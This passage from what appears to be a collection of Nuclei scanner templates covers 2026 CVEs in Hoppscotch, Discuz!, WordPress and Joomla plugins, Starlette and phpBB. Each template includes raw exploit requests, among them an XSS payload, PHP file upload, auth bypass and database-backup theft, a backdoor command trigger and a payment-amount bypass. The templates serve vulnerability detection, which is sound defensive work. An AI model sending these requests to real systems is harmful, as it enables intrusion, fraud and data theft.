critical\n  description: |\n    Hoppscotch self-hosted backend <= 2026.4.1 contains a broken authentication caused by mass assignment via unauthenticated POST /v1/onboarding/config endpoint, letting unauthenticated attackers overwrite JWT_SECRET to forge tokens and fully compromise the server, exploit requires attacker to access fresh instance before onboarding completes or when no users exist.\n  impact: |\n    Unauthenticated attackers can forge JWT tokens and fully compromise the server, including administrator access.\n  remediation: |\n    Update to version 2026.5.0 or later.\n  reference:\n    - https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-j542-4rch-8hwf\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-50160\n    - https://github.com/hoppscotch/hoppscotch/pull/6171\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10.0\n    cve-id: CVE-2026-50160\n    epss-score: 0.01701\n    epss-percentile: 0.76212\n    cwe-id: CWE-915\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: hoppscotch\n    product: hoppscotch\n    shodan-query: http.title:\"Hoppscotch\"\n    fofa-query: title=\"Hoppscotch\"\n  tags: cve,cve2026,hoppscotch,mass-assignment,jwt\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /v1/onboarding/status HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"canReRunOnboarding\")'\n          - 'contains(body, \"\\\"onboardingCompleted\\\":false\") || contains(body, \"\\\"canReRunOnboarding\\\":true\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /v1/onboarding/config HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json\n\n        {\"CVE_2026_50160_DETECT\":\"true\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains(body, \"VITE_ALLOWED_AUTH_PROVIDERS\")'\n          - '!contains(body, \"should not exist\")'\n        condition: and\n# digest: 490a00463044022030d5ef7d62513b1a8f203bbd93e701c78714ccf0d7f046e40796bb98fb4d03ed0220469012d3e7a1a9ea4534bbcb990062458576ae2c627718974be84040f248edfd:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-50160.yaml","vuln_id":"cve-2026-50160"},{"raw":"id: CVE-2026-49952\n\ninfo:\n  name: Discuz! X5.0 - Authentication Bypass\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   Discuz! X5.0 20260320 through 20260501 contains an authentication bypass caused by exploitation of a shared cryptographic key and encryption oracle in dbbak.php and logging_ctl::logging_more(), letting unauthenticated remote attackers access database backup and restore functions, exploit requires crafted payload injection via username parameter.\n  impact: |\n    Unauthenticated attackers can bypass authorization to export/import database and impersonate arbitrary users, risking full database compromise.\n  remediation: |\n    Update to a version later than 20260501 or latest available version.\n  reference:\n    - https://karmainsecurity.com/KIS-2026-09\n    - https://www.exploit-db.com/exploits/52621\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-49952\n    - https://gitee.com/Discuz/DiscuzX/commit/9962dad52c4c6999dabaf91ecd70377c680ff3c6\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2026-49952\n    epss-score: 0.04717\n    epss-percentile: 0.91418\n    cwe-id: CWE-323\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: discuz\n    product: discuz_x\n    shodan-query: http.html:\"Discuz! X5.0\"\n    fofa-query: body=\"Discuz! X5.0\"\n  tags: cve,cve2026,discuz,auth-bypass,intrusive\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Discuz! X5\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /member.php?mod=logging&action=login&loginsubmit=yes HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username=method%3Dexport%26time%3D9999999999%26&password=1&lssubmit=1\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"auth=\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: authcode\n        group: 1\n        internal: true\n        regex:\n          - 'auth=([^&\"''<>\\s]+)'\n\n  - raw:\n      - |\n        GET /api/db/dbbak.php?apptype=discuzx&code={{authcode}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"errorCode=\\\"0\\\"\") || contains(body, \"data/backup_\") || contains_any(body, \"CREATE TABLE\", \"INSERT INTO\")'\n        condition: and\n# digest: 4a0a00473045022071d3517f7d0a7431ae57a92ec57356c2afd5ee01c47821dc06bcc0d7de0ff0a2022100af24cf57d6a1f77fc0b25ec781ae3a5ce7f4b50dbe4ae488c8e035af04e3f76f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-49952.yaml","vuln_id":"cve-2026-49952"},{"raw":"id: CVE-2026-4987\n\ninfo:\n  name: SureForms <= 2.5.2 - Unauthenticated Payment Amount Validation Bypass via form_id\n  author: iamatownboy\n  severity: high\n  description: |\n    The SureForms plugin for WordPress is vulnerable to payment amount validation bypass in versions up to, and including, 2.5.2.\n    The create_payment_intent AJAX handler checks `if ($form_id > 0 && !empty($block_id))` before calling validate_payment_amount().\n    By sending form_id=0 (the default intval of a missing/zero value), an unauthenticated attacker completely skips the server-side\n    amount validation and can create Stripe payment intents with arbitrary amounts, bypassing configured pricing.\n  impact: |\n    Unauthenticated attackers can create underpriced payment or subscription intents and complete purchases at fraudulent prices.\n  remediation: |\n    Update SureForms to version 2.6.0 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-4987\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c4772b32-a730-44f2-b43c-f9bd5abb6541?source=cve\n    - https://plugins.trac.wordpress.org/changeset/3488858/sureforms\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-4987\n    epss-score: 0.00955\n    epss-percentile: 0.59884\n    cwe-id: CWE-20\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: brainstormforce\n    product: sureforms\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/sureforms/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,sureforms,payment,validation-bypass,unauth\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/sureforms/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"SureForms\")\n          - compare_versions(version, \"<= 2.5.2\")\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/sureforms/v1/refresh-nonces\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"payment_nonce\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: payment_nonce\n        part: body\n        group: 1\n        regex:\n          - '\"payment_nonce\"\\s*:\\s*\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Origin: {{BaseURL}}\n        Referer: {{BaseURL}}/\n\n        action=srfm_create_payment_intent&nonce={{payment_nonce}}&amount=1&currency=usd&form_id=0&block_id=&description=SureForms&customer_email=test@example.com&customer_name=test\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"client_secret\"\n          - \"payment_intent_id\"\n          - \"API Key provided\"\n        condition: or\n\n      - type: word\n        part: body\n        words:\n          - \"Invalid nonce\"\n        negative: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022045412a234b89e38729c4a396e4239a195bb43fb271fa67d1dac73a3aed3edd3c022100c90ef73fd652c2ec59e20888b4bdba7d480e0f2050ece9e8e9fcbe6c9da48962:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-4987.yaml","vuln_id":"cve-2026-4987"},{"raw":"id: CVE-2026-49777\n\ninfo:\n  name: WordPress Product Slider Pro for WooCommerce < 3.5.4 - Supply Chain Backdoor RCE\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Improper Validation of Specified Quantity in Input vulnerability in ShapedPlugin, LLC Product Slider Pro for WooCommerce allows Malicious Software Implanted. This issue affects Product Slider Pro for WooCommerce: from n/a before 3.5.4.\n  impact: |\n    Attackers can implant malicious software, potentially compromising the system or data integrity.\n  remediation: |\n    Apply the vendor's patch or update to the latest fixed version when available.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/woo-product-slider-pro/vulnerability/wordpress-product-slider-pro-for-woocommerce-plugin-3-5-2-backdoor-vulnerability\n    - https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-49777\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-49777\n    epss-score: 0.01656\n    epss-percentile: 0.75546\n    cwe-id: CWE-506\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: shapedplugin\n    product: product_slider_pro_for_woocommerce\n    framework: wordpress\n    shodan-query: http.component:\"WordPress\"\n    fofa-query: body=\"wp-content/plugins/woo-product-slider-pro\"\n  tags: cve,cve2026,wordpress,wp-plugin,backdoor,rce,supply-chain,woocommerce,unauth,shapedplugin,vkev\n\nvariables:\n  a: \"{{rand_int(10000, 99999)}}\"\n  b: \"{{rand_int(10000, 99999)}}\"\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        X-Cache-Status: nw9xQmK4\n        X-Cache-Key: {{base64(\"expr \" + a + \" + \" + b)}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{to_number(a)+to_number(b)}}\"\n\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(content_type, 'text/plain')\"\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - \"body\"\n# digest: 490a004630440220402177efc836332a677351a81e609bd89dbbde27ba1c56e51f2163ee5dc29fcf0220235b6d83a022bd93c7700af251ce82dcd7165465bb2d8450888c46ebf11f4cdb:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-49777.yaml","vuln_id":"cve-2026-49777"},{"raw":"id: CVE-2026-49069\n\ninfo:\n  name: WPZOOM Portfolio <= 1.4.21 - Reflected Cross-Site Scripting\n  author: aryu-ru\n  severity: high\n  description: |\n    WPZOOM Portfolio <= 1.4.21 contains a reflected XSS caused by improper neutralization of input during web page generation, letting attackers execute scripts in victim's browser, exploit requires crafted request.\n  impact: |\n    Attackers can execute scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.\n  remediation: |\n    Update to the latest version of WPZOOM Portfolio.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/wpzoom-portfolio/vulnerability/wordpress-wpzoom-portfolio-plugin-1-4-21-cross-site-scripting-xss-vulnerability?_s_id=cve\n    - https://www.exploit-db.com/exploits/52611\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-49069\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n    cvss-score: 7.1\n    cve-id: CVE-2026-49069\n    epss-score: 0.01171\n    epss-percentile: 0.66065\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: wpzoom\n    product: wpzoom-portfolio\n    shodan-query: http.html:\"/wp-content/plugins/wpzoom-portfolio\"\n    fofa-query: body=\"/wp-content/plugins/wpzoom-portfolio\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,wpzoom,xss,unauth\n\nvariables:\n  marker: \"{{randstr}}\"\n\nflow: http(1) && (http(2) || http(3))\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 3\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"wpzoom-portfolio\")\n          - status_code == 200\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22post%22%2C%22class%22%3A%22{{marker}}%27%20onfocus%3D%27alert(document.domain)%27%20autofocus%3D%27%22%7D\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"onfocus='alert(document.domain)'\"\n          - \"wpzoom-ajax-portfolio-items\"\n        condition: and\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wpzoom_load_more_items&offset=0&posts_data=%7B%22source%22%3A%22portfolio_item%22%2C%22class%22%3A%22{{marker}}%27%20onfocus%3D%27alert(document.domain)%27%20autofocus%3D%27%22%7D\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"onfocus='alert(document.domain)'\"\n          - \"wpzoom-ajax-portfolio-items\"\n        condition: and\n# digest: 4b0a00483046022100afe66cab73a9e23acc66db0727eae086be6fc58fe6c6f518f7f721b366bae7f4022100d7718e0c22bc81c81a89bc08c955c0625a3490dee03ba880290c17a6705f6e79:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-49069.yaml","vuln_id":"cve-2026-49069"},{"raw":"id: CVE-2026-49060\n\ninfo:\n  name: Hippoo Mobile App for WooCommerce - Broken Access Control\n  author: theamanrawat\n  severity: critical\n  description: |\n    Hippoo Mobile App for WooCommerce <= 1.9.4 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.\n  impact: |\n    Attackers can escalate their privileges, potentially gaining unauthorized access or control over the application.\n  remediation: |\n    Update to the latest version.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-9-4-privilege-escalation-vulnerability\n    - https://github.com/advisories/GHSA-mh6m-7983-2r5w\n    - https://wordpress.org/plugins/hippoo/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-49060\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-49060\n    epss-score: 0.00514\n    epss-percentile: 0.42763\n    cwe-id: CWE-266\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: hippoo\n    product: hippoo\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/hippoo/\"\n    publicwww-query: \"/wp-content/plugins/hippoo\"\n  tags: cve,cve2026,wordpress,broken-access-control,privilege-escalation,hippoo,woocommerce,unauth,vuln,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/hippoo/readme.txt\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Hippoo\"\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?rest_route=/wc-hippoo/v1/ext/wp/v2/users/1\"\n      - \"{{BaseURL}}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1\"\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"\\\"slug\\\":\"\n          - \"\\\"avatar_urls\\\":\"\n          - \"\\\"_links\\\":\"\n          - \"\\\"link\\\":\"\n        condition: or\n\n      - type: word\n        part: body\n        words:\n          - \"rest_forbidden\"\n          - \"not allowed\"\n        negative: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100e9fc697a07afb34404fe06c7b8a79f375d36bf74c552aa921e717130e6c96c9d022100c0ae5ed20c72b6fe05ed2452883d88b0eb9b1c7c2fe775a14e4df5821e75897c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-49060.yaml","vuln_id":"cve-2026-49060"},{"raw":"id: CVE-2026-49049\n\ninfo:\n  name: JoomShaper Helix3 <=3.1.0 - Unauthenticated Arbitrary JSON File Write\n  author: DhiyaneshDk,pdteam\n  severity: high\n  description: |\n    JoomShaper Helix3 template framework versions 1.0 through 3.1.0 for Joomla expose an unauthenticated AJAX handler (plg_ajax_helix3) accessible via the Joomla com_ajax component. The onAjaxHelix3() plugin method processes data[action]=save requests without any authentication check or CSRF token validation. Unauthenticated remote attackers can write arbitrary JSON content to server-side files. The layoutName parameter contains no path traversal validation, enabling write to any directory writable by the web server process. Actively exploited in the wild by the AntonKill botnet campaign.\n  impact: |\n    Unauthenticated attackers can write arbitrary JSON content to server files, enabling template configuration manipulation, stored XSS via template parameters, and remote code execution via path traversal to place webshells or malicious configuration files in any web-accessible directory writable by the web server.\n  remediation: |\n    Update JoomShaper Helix3 to version 3.1.1 or later, which adds proper authorization checks to the plg_ajax_helix3 AJAX handler. If the Helix3 template is unused, disable and remove the plg_ajax_helix3 system plugin via the Joomla administrator panel. As a WAF mitigation, block POST requests to index.php where the query string contains both option=com_ajax and plugin=helix3.\n  reference:\n    - https://github.com/Dr-D25/CVE-2026-49049\n    - https://kevintel.com/CVE-2026-49049\n    - https://www.joomshaper.com/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-49049\n    cwe-id: CWE-284\n    epss-score: 0.00992\n    epss-percentile: 0.61063\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: ollyo\n    product: helix3\n    framework: joomla\n    fofa-query: body=\"shaper_helix3\"\n    shodan-query: html:\"shaper_helix3\"\n  tags: cve,cve2026,joomla,helix3,unauth,filewrite,missing-authorization,intrusive,vkev\n\nvariables:\n  probe_file: \"nuclei_{{rand_text_alpha(6)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\n        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"helix3\"\n        case-insensitive: true\n        internal: true\n\n  - raw:\n      - |\n        POST /index.php?option=com_ajax&plugin=helix3&format=json HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\n        Accept: application/json, text/javascript, */*\n\n        data[action]=save&data[layoutName]={{probe_file}}&data[content]={\"_nuclei_probe\":\"cve-2026-49049\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n          - 'fwrite()'\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220095cc99a5878db232f61d06396281a53f826367805d1e77c700cf35f724209b30220663e489cbaa3aa4057c8ac69addda2c16cb964781de177b24a8c2430ac0cc40c:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-49049.yaml","vuln_id":"cve-2026-49049"},{"raw":"id: CVE-2026-48939\n\ninfo:\n  name: Joomla iCagenda < 3.9.10 - Unauthenticated Arbitrary File Upload RCE\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    iCagenda extension for Joomla contains an unrestricted file upload vulnerability in the file attachment feature, letting attackers upload and execute arbitrary PHP code, exploit requires no special privileges.\n  impact: |\n    Attackers can upload and execute arbitrary PHP code, leading to full server compromise.\n  remediation: |\n    Update to the latest version of iCagenda extension.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-48939\n    - https://github.com/ChiefYoru/CVE-2026-48939_PoC\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-48939\n    epss-score: 0.20069\n    epss-percentile: 0.97328\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: joomlic\n    product: icagenda\n    framework: joomla\n    shodan-query: http.html:\"com_icagenda\"\n    fofa-query: body=\"com_icagenda\"\n  tags: cve,cve2026,joomla,icagenda,file-upload,rce,intrusive,kev,vkev\n\nvariables:\n  marker: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /administrator/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"icagenda\") || contains(body, \"iCagenda\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: csrf\n        group: 1\n        internal: true\n        regex:\n          - 'name=\"([a-f0-9]{32})\"\\s+value=\"1\"'\n\n  - raw:\n      - |\n        POST /index.php?option=com_icagenda&task=registration.submit HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----iCagendaBoundary48939\n        X-Requested-With: XMLHttpRequest\n        Referer: {{BaseURL}}/\n\n        ------iCagendaBoundary48939\n        Content-Disposition: form-data; name=\"{{csrf}}\"\n\n        1\n        ------iCagendaBoundary48939\n        Content-Disposition: form-data; name=\"jform[attachment]\"; filename=\"{{marker}}.txt\"\n        Content-Type: text/plain\n\n        CVE-2026-48939-FILE-UPLOAD-CONFIRMED\n        ------iCagendaBoundary48939--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200 || status_code == 303'\n        internal: true\n\n  - raw:\n      - |\n        GET /images/icagenda/frontend/attachments/{{marker}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"CVE-2026-48939-FILE-UPLOAD-CONFIRMED\")'\n        condition: and\n# digest: 4a0a00473045022100f40b83f7902eddb407923af5b1ffac40d2a225200956e818b82a7053845aefd202200704158f623c99a959757cebe1ae74b7e4bb47bb244c6451474e038fdd5348be:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48939.yaml","vuln_id":"cve-2026-48939"},{"raw":"id: CVE-2026-48907\ninfo:\n  name: Joomla! JCE extension < 2.9.99.5 unauthenticated RCE\n  author: ywh-jfellus\n  severity: critical\n  description: |\n    Joomla JCE editor extension contains an unrestricted file upload vulnerability caused by allowing unauthenticated users to create new editor profiles, letting attackers upload and execute PHP code remotely, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can upload and execute arbitrary PHP code, leading to full remote code execution on the server.\n  remediation: |\n    Update to the latest version of the JCE editor extension.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-48907\n    - https://github.com/advisories/GHSA-c3f5-4g7f-qjqj\n    - https://www.joomlacontenteditor.net/support/changelog/editor\n    - https://github.com/ywh-jfellus/CVE-2026-48907\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 10.0\n    cve-id: CVE-2026-48907\n    epss-score: 0.781\n    epss-percentile: 0.99554\n    cwe-id: CWE-284\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: joomlacontenteditor\n    product: jce\n    shodan-query: http.component:\"Joomla\"\n    fofa-query: app=\"Joomla\"\n  tags: cve,cve2026,joomla,jce,rce,unauth,intrusive,unauth,vkev,kev\n\nvariables:\n  payload: \"<?= 45*69 ?>\"\n  tmp_file: \"{{'nuclei-' + md5(Hostname + 'phuJ4OoP')}}.xml.php\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - 'contains(body, \"Joomla\")'\n          - 'contains(body, \"csrf.token\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: csrf_token\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"csrf\\.token\"\\s*:\\s*\"([a-f0-9]{32})\"'\n\n  - raw:\n      - |\n        POST /index.php?option=com_jce HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=66dea244639dd05378afdad58c2c9c1d\n\n        --66dea244639dd05378afdad58c2c9c1d\n        Content-Disposition: form-data; name=\"task\"\n\n        profiles.import\n        --66dea244639dd05378afdad58c2c9c1d\n        Content-Disposition: form-data; name=\"{{csrf_token}}\"\n\n        1\n        --66dea244639dd05378afdad58c2c9c1d\n        Content-Disposition: form-data; name=\"profile_file\"; filename=\"{{tmp_file}}\"\n        Content-Type: application/xml\n\n        {{payload}}\n        --66dea244639dd05378afdad58c2c9c1d--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - 'contains(body, \"success\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /tmp/{{tmp_file}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"3105\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220070dd5041d738e7b72a477a4c730240069216a37d13a064672064d9d6ded9896022100f761476be762dadedd972d383862edf5012902a4a602e9c8f06a737638b5622c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48907.yaml","vuln_id":"cve-2026-48907"},{"raw":"id: CVE-2026-48710\n\ninfo:\n  name: Starlette - Improper Validation of Unsafe Equivalence in Input\n  author: ritikchaddha\n  severity: critical\n  description: |\n    A flaw was found in Starlette, a lightweight ASGI (Asynchronous Server Gateway Interface) framework. A remote attacker could exploit this vulnerability by sending a specially crafted HTTP Host request header. This malformed header could cause the request.url to be incorrectly reconstructed, leading to a discrepancy with the actual requested path. Consequently, security restrictions enforced by middleware and endpoints that rely on request.url for validation could be bypassed, potentially allowing unauthorized access or actions.\n  impact: |\n    A remote attacker can exploit this vulnerability by sending a specially crafted HTTP Host header in a request to a Starlette-based application. Due to improper validation of the Host header, security restrictions that rely on request.url for enforcement may be bypassed. This allows attackers to gain unauthorized access to endpoints protected by middleware or path-based checks, potentially leading to privilege escalation, information disclosure, or unauthorized actions.\n  remediation: |\n    Upgrade Starlette to >= 1.0.1 to address this vulnerability.If immediate patching is not possible, implement strict Host header validation in a reverse proxy or web server (such as nginx or Apache) to only allow expected Host values, mitigating the risk of URL-based restriction bypass.\n  reference:\n    - https://github.com/Kludex/starlette/security/advisories/GHSA-86qp-5c8j-p5mr\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-48710\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2026-48710\n    epss-score: 0.36257\n    epss-percentile: 0.98411\n    cwe-id: CWE-1289\n  metadata:\n    max-request: 2\n    vendor: Kludex\n    product: starlette\n    shodan-query: http.html:\"starlette\"\n    fofa-query: body=\"starlette\"\n  tags: cve,cve2026,starlette,auth-bypass,badhost,vkev,kev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /mcp-rest/test/connection HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"transport\":\"stdio\",\"command\":\"echo\",\"args\":[\"test\"]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n          - 'contains_any(body, \"auth_error\", \"Authentication Error\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /mcp-rest/test/connection HTTP/1.1\n        Host: a/?x=\n        Content-Type: application/json\n        Content-Length: 54\n\n        {\"transport\":\"stdio\",\"command\":\"echo\",\"args\":[\"test\"]}\n\n    unsafe: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"Failed to connect to MCP server\"\n          - \"status\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022035cea868dfbb089fb73b7f0d6ff8c4db0cea5bdd90a80c5d8e001c4f4749848402210080d82c4c84d35ca88863968a75a985711d5572d20fde860ba6a951916095be5f:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-48710.yaml","vuln_id":"cve-2026-48710"},{"raw":"id: CVE-2026-48611\n\ninfo:\n  name: phpBB < 3.3.17 - Authentication Bypass\n  author: aikido,DhiyaneshDk\n  severity: critical\n  description: |\n    phpBB before 3.3.17 contains an authentication bypass vulnerability in the login-link feature. By setting the auth_provider query parameter to \"apache\", an unauthenticated attacker can bypass password verification and log in as any user, including administrators. The Apache auth provider trusts the Basic authentication header username without password verification, as it assumes Apache handles authentication upstream.\n  impact: |\n    